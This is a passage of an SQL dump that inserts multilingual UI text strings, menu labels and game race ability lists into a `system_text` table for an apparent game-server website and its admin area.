`time_create`, `time_edit`) VALUES ('default', 'deDE', 'Mojotrollz - simply the best.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('default', 'enUS', 'Mojotrollz - simply the best.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('friend_name', 'deDE', 'Name des Freundes', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('friend_name', 'enUS', 'enter friend\'s name', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('friend_title', 'deDE', 'Freundesliste', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('friend_title', 'enUS', 'Friendlist', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('mojotrollz_page_title', 'deDE', 'MojotrollZ', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('mojotrollz_page_title', 'enUS', 'MojotrollZ', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_dwarf', 'deDE', ' Stoneform
\n Frost Resistance
\n Find Treasure
\n Gun Specialization
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_dwarf', 'enUS', ' Stoneform
\n Frost Resistance
\n Find Treasure
\n Gun Specialization
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_gnome', 'deDE', ' Escape Artist
\n Expansive Mind
\n Arcane Resistance
\n Engineering Specialist
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_gnome', 'enUS', ' Escape Artist
\n Expansive Mind
\n Arcane Resistance
\n Engineering Specialist
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_human', 'deDE', ' \nDiplomacy
\n \nThe Human Spirit
\n \nMace Specialization
\n \nSword Specialization
 \nPerception

', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_human', 'enUS', ' \r\nDiplomacy
\r\n \r\nThe Human Spirit
\r\n \r\nMace Specialization
\r\n \r\nSword Specialization
 \r\nPerception

', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_nightelf', 'deDE', ' Shadowmeld
\n Quickness
\n Wisp Spirit
\n Nature Resistance
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_nightelf', 'enUS', ' Shadowmeld
\n Quickness
\n Wisp Spirit
\n Nature Resistance
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_ork', 'deDE', ' Blood Fury
\n Hardiness
\n Command
\n Axe Specialization
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_ork', 'enUS', ' Blood Fury
\n Hardiness
\n Command
\n Axe Specialization
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_tauren', 'deDE', ' War Stomp
\n Endurance
\n Cultivation
\n Nature Resistance
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_tauren', 'enUS', ' War Stomp
\n Endurance
\n Cultivation
\n Nature Resistance
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_troll', 'deDE', ' Berserking
\n Regeneration
\n Beast Slaying
\n
Bow Specialization
\nThrowing Specialization
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_troll', 'enUS', ' Berserking
\n Regeneration
\n Beast Slaying
\n
Bow Specialization
\nThrowing Specialization
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_undead', 'deDE', ' Will of the Forsaken
\n Cannibalize
\n Shadow Resistance
\nUnderwater Breathing
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('race_undead', 'enUS', ' Will of the Forsaken
\n Cannibalize
\n Shadow Resistance
\nUnderwater Breathing
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('realmlist', 'deDE', 'mojotrollz.eu', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('realmlist', 'enUS', 'mojotrollz.eu', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_api_title', 'deDE', 'System API', 2, 2, '2015-04-17 19:29:25', '2015-04-17 19:29:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_api_title', 'enUS', 'System API', 2, 2, '2015-04-17 19:29:25', '2015-04-17 19:29:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_api_title', 'esES', 'System API', 2, 2, '2015-04-17 19:29:25', '2015-04-17 19:29:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_api_title', 'frFR', 'System API', 2, 2, '2015-04-17 19:29:25', '2015-04-17 19:29:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_api_title', 'trTR', 'System API', 2, 2, '2015-04-17 19:29:25', '2015-04-17 19:29:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_cache_title', 'deDE', 'System Cache', 2, 2, '2015-04-17 19:30:41', '2015-04-17 19:30:41'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_cache_title', 'enUS', 'System Cache', 2, 2, '2015-04-17 19:30:41', '2015-04-17 19:30:41'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_config_title', 'deDE', 'System Config', 2, 2, '2015-04-17 19:29:05', '2015-04-17 19:29:05'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_config_title', 'enUS', 'System Config', 2, 2, '2015-04-17 19:29:05', '2015-04-17 19:29:05'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_copyright', 'deDE', '${project} © WebCraft Media 2015', 2, 2, '2015-04-17 19:15:03', '2015-04-17 19:15:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_copyright', 'enUS', '${project} © WebCraft Media 2015', 2, 2, '2015-04-17 19:15:03', '2015-04-17 19:15:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_copyright', 'esES', '${project} © WebCraft Media 2015', 2, 2, '2015-04-17 19:15:03', '2015-04-17 19:15:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_copyright', 'frFR', '${project} © WebCraft Media 2015', 2, 2, '2015-04-17 19:15:03', '2015-04-17 19:15:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_copyright', 'trTR', '${project} © WebCraft Media 2015', 2, 2, '2015-04-17 19:15:03', '2015-04-17 19:15:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_cron_title', 'deDE', 'System Cron', 2, 2, '2015-04-17 19:31:02', '2015-04-17 19:31:02'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_cron_title', 'enUS', 'System Cron', 2, 2, '2015-04-17 19:31:02', '2015-04-17 19:31:02'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_docu_title', 'deDE', 'System - Dokumentation', 2, 2, '2015-04-21 03:42:27', '2015-04-21 03:42:27'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_docu_title', 'enUS', 'System - Documentation', 2, 2, '2015-04-21 03:42:01', '2015-04-21 03:42:01'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_docu_title', 'jaJA', 'System - ドキュメンテーション', 2, 2, '2015-04-21 03:42:09', '2015-04-21 03:42:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_files_title', 'deDE', 'System Dateien', 3, 3, '2015-05-16 13:53:33', '2015-05-16 13:53:33'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_files_title', 'enUS', 'System ファイル', 2, 1, '2015-04-20 16:18:27', '2015-04-20 16:18:27'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_files_title', 'frFR', 'System Fichiers', 3, 3, '2015-04-20 19:15:58', '2015-04-20 19:15:58'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_git_title', 'deDE', 'System Git', 2, 2, '2015-04-23 01:53:37', '2015-04-23 01:53:37'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_git_title', 'enUS', 'System Git', 2, 2, '2015-04-17 19:22:57', '2015-04-17 19:22:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_git_title', 'esES', 'System Git', 2, 2, '2015-04-17 19:22:57', '2015-04-17 19:22:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_git_title', 'frFR', 'System Git', 2, 2, '2015-04-17 19:22:57', '2015-04-17 19:22:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_git_title', 'trTR', 'System Git', 2, 2, '2015-04-17 19:22:57', '2015-04-17 19:22:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_log_latest_entries', 'deDE', 'letzten Log Einträge', 0, 0, '2015-04-16 23:26:52', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_log_latest_entries', 'enUS', 'latest log entries', 2, 1, '2015-04-16 23:31:20', '2015-04-16 23:31:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_log_latest_entries', 'frFR', 'Entrées récammentes', 3, 3, '2015-04-20 16:37:57', '2015-04-20 16:37:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_log_page_value', 'deDE', 'SW', 1, 2, '2015-04-16 23:22:39', '2015-04-16 20:21:29'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_log_page_value', 'enUS', 'PV', 2, 2, '2015-04-21 03:36:14', '2015-04-21 03:36:14'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_log_title', 'deDE', 'System Protokoll', 2, 2, '2015-04-23 01:51:28', '2015-04-23 01:51:28'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_log_title', 'enUS', 'System Log', 2, 2, '2015-04-17 19:28:09', '2015-04-17 19:28:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_log_title', 'jaJA', 'System 報告', 2, 2, '2015-04-23 01:45:24', '2015-04-23 01:45:24'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_api', 'deDE', 'API', 1, 1, '2015-04-19 20:48:44', '2015-04-19 20:48:44'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_api', 'enUS', 'API', 2, 2, '2015-04-17 19:17:28', '2015-04-17 19:17:28'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_api', 'esES', 'API', 3, 3, '2015-04-20 19:11:39', '2015-04-20 19:11:39'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_api', 'frFR', 'API', 3, 3, '2015-04-20 19:11:39', '2015-04-20 19:11:39'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_api', 'jaJA', 'エーピーアイ', 1, 1, '2015-04-19 21:02:19', '2015-04-19 21:02:19'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_api', 'trTR', 'API', 3, 3, '2015-04-20 19:11:39', '2015-04-20 19:11:39'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_cache', 'deDE', 'Cache', 2, 2, '2015-04-17 19:18:07', '2015-04-17 19:18:07'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_cache', 'enUS', 'Cache', 2, 2, '2015-04-17 19:18:07', '2015-04-17 19:18:07'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_cache', 'esES', 'Cache', 3, 3, '2015-04-20 19:14:00', '2015-04-20 19:14:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_cache', 'frFR', 'Cache', 3, 3, '2015-04-20 19:14:00', '2015-04-20 19:14:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_cache', 'jaJA', 'キャッシュ', 1, 1, '2015-04-19 21:13:51', '2015-04-19 21:13:51'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_cache', 'trTR', 'Cache', 3, 3, '2015-04-20 19:14:00', '2015-04-20 19:14:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_config', 'deDE', 'Konfiguration', 1, 1, '2015-04-19 20:45:36', '2015-04-19 20:45:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_config', 'enUS', 'Config', 2, 2, '2015-04-17 19:17:06', '2015-04-17 19:17:06'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_config', 'frFR', 'Config', 3, 3, '2015-04-20 19:10:18', '2015-04-20 19:10:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_config', 'jaJA', 'コンフィギュレーション', 1, 1, '2015-04-19 20:46:12', '2015-04-19 20:46:12'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_cron', 'deDE', 'Cron', 1, 1, '2015-04-19 21:17:24', '2015-04-19 21:17:24'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_cron', 'enUS', 'Cron', 2, 2, '2015-04-17 19:18:22', '2015-04-17 19:18:22'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_cron', 'esES', 'Cron', 2, 2, '2015-04-17 19:18:22', '2015-04-17 19:18:22'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_cron', 'frFR', 'Cron', 2, 2, '2015-04-17 19:18:22', '2015-04-17 19:18:22'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_cron', 'jaJA', 'スケジューラ', 1, 1, '2015-04-19 21:17:04', '2015-04-19 21:17:04'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_cron', 'trTR', 'Cron', 2, 2, '2015-04-17 19:18:22', '2015-04-17 19:18:22'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_docu', 'deDE', 'Docu', 2, 2, '2015-04-17 19:18:38', '2015-04-17 19:18:38'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_docu', 'enUS', 'Docu', 2, 2, '2015-04-17 19:18:38', '2015-04-17 19:18:38'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_docu', 'esES', 'Docu', 3, 3, '2015-04-20 19:11:20', '2015-04-20 19:11:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_docu', 'frFR', 'Docu', 3, 3, '2015-04-20 19:11:20', '2015-04-20 19:11:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_docu', 'jaJA', 'ドキュメンテーション', 1, 1, '2015-04-19 21:00:25', '2015-04-19 21:00:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_files', 'deDE', 'Dateien', 1, 1, '2015-04-19 20:54:12', '2015-04-19 20:54:12'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_files', 'enUS', 'Files', 2, 2, '2015-04-17 19:17:53', '2015-04-17 19:17:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_files', 'frFR', 'Fichiers', 3, 3, '2015-04-20 19:09:23', '2015-04-20 19:09:23'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_files', 'jaJA', 'ファイル', 1, 1, '2015-04-19 20:53:58', '2015-04-19 20:53:58'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_git', 'deDE', 'Git', 2, 2, '2015-05-19 00:44:29', '2015-05-19 00:44:29'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_git', 'enUS', 'Git', 2, 2, '2015-05-19 00:44:20', '2015-05-19 00:44:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_git', 'esES', 'Git', 2, 2, '2015-05-19 00:44:20', '2015-05-19 00:44:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_git', 'frFR', 'Git', 2, 2, '2015-05-19 00:44:20', '2015-05-19 00:44:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_git', 'trTR', 'Git', 2, 2, '2015-05-19 00:44:20', '2015-05-19 00:44:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_log', 'deDE', 'Protokoll', 1, 1, '2015-04-19 20:34:08', '2015-04-19 20:34:08'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_log', 'enUS', 'Log', 2, 2, '2015-04-17 19:16:07', '2015-04-17 19:16:07'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_log', 'frFR', 'Log', 3, 3, '2015-04-20 19:05:30', '2015-04-20 19:05:30'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_log', 'jaJA', '報告', 1, 1, '2015-04-19 20:33:52', '2015-04-19 20:33:52'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_login', 'deDE', 'Login', 2, 2, '2015-04-17 19:19:03', '2015-04-17 19:19:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_login', 'enUS', 'Login', 2, 2, '2015-04-17 19:19:03', '2015-04-17 19:19:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_login', 'frFR', 'Connecter', 3, 3, '2015-04-20 19:10:51', '2015-04-20 19:10:51'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_login', 'jaJA', 'ログイン', 1, 1, '2015-04-19 20:58:09', '2015-04-19 20:58:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_logout', 'deDE', 'Ausloggen', 2, 2, '2015-04-17 20:29:13', '2015-04-17 20:29:13'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_logout', 'enUS', 'Logout', 2, 2, '2015-04-17 19:18:52', '2015-04-17 19:18:52'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_logout', 'frFR', 'Deconnecter', 3, 3, '2015-04-20 16:38:49', '2015-04-20 16:38:49'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_logout', 'jaJA', 'ログアウト', 2, 2, '2015-04-17 20:29:05', '2015-04-17 20:29:05'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_mod', 'deDE', 'Plug-in', 1, 1, '2015-04-19 20:43:36', '2015-04-19 20:43:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_mod', 'enUS', 'Mod', 2, 2, '2015-04-17 19:16:41', '2015-04-17 19:16:41'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_mod', 'jaJA', 'プラグイン', 1, 1, '2015-04-19 20:43:08', '2015-04-19 20:43:08'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_page', 'deDE', 'Seite', 1, 1, '2015-04-19 20:51:17', '2015-04-19 20:51:17'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_page', 'enUS', 'Page', 2, 2, '2015-04-17 19:17:41', '2015-04-17 19:17:41'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_page', 'frFR', 'Page', 3, 3, '2015-04-20 19:08:59', '2015-04-20 19:08:59'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_page', 'jaJA', '組織', 1, 1, '2015-04-19 20:50:55', '2015-04-19 20:50:55'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_security', 'deDE', 'Benutzerverwaltung', 1, 1, '2015-04-19 20:39:48', '2015-04-19 20:39:48'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_security', 'enUS', 'Security', 2, 2, '2015-04-17 19:16:21', '2015-04-17 19:16:21'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_security', 'frFR', 'Sécurité', 3, 3, '2015-04-20 20:35:24', '2015-04-20 20:35:24'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_security', 'jaJA', '利用者経営', 1, 1, '2015-04-19 20:39:09', '2015-04-19 20:39:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_start', 'deDE', 'Slingit - Admin Bereich', 1, 1, '2015-04-19 21:12:46', '2015-04-19 21:12:46'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_start', 'enUS', 'Slingit - Admin area', 2, 1, '2015-04-19 21:11:58', '2015-04-19 21:11:58'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_start', 'frFR', 'Slingit - Domaine d\'administration', 3, 3, '2015-04-20 19:13:28', '2015-04-20 19:13:28'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_start', 'jaJA', 'Slingit - アドミンーエリア', 1, 1, '2015-04-19 21:12:10', '2015-04-19 21:12:10'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_text', 'deDE', 'Text', 1, 1, '2015-04-19 20:56:09', '2015-04-19 20:56:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_text', 'enUS', 'Text', 2, 2, '2015-04-17 19:19:20', '2015-04-17 19:19:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_text', 'frFR', 'Texte', 3, 3, '2015-04-20 19:09:48', '2015-04-20 19:09:48'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_text', 'jaJA', 'テクスト', 1, 1, '2015-04-19 20:55:54', '2015-04-19 20:55:54'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_todo', 'deDE', 'To-do', 1, 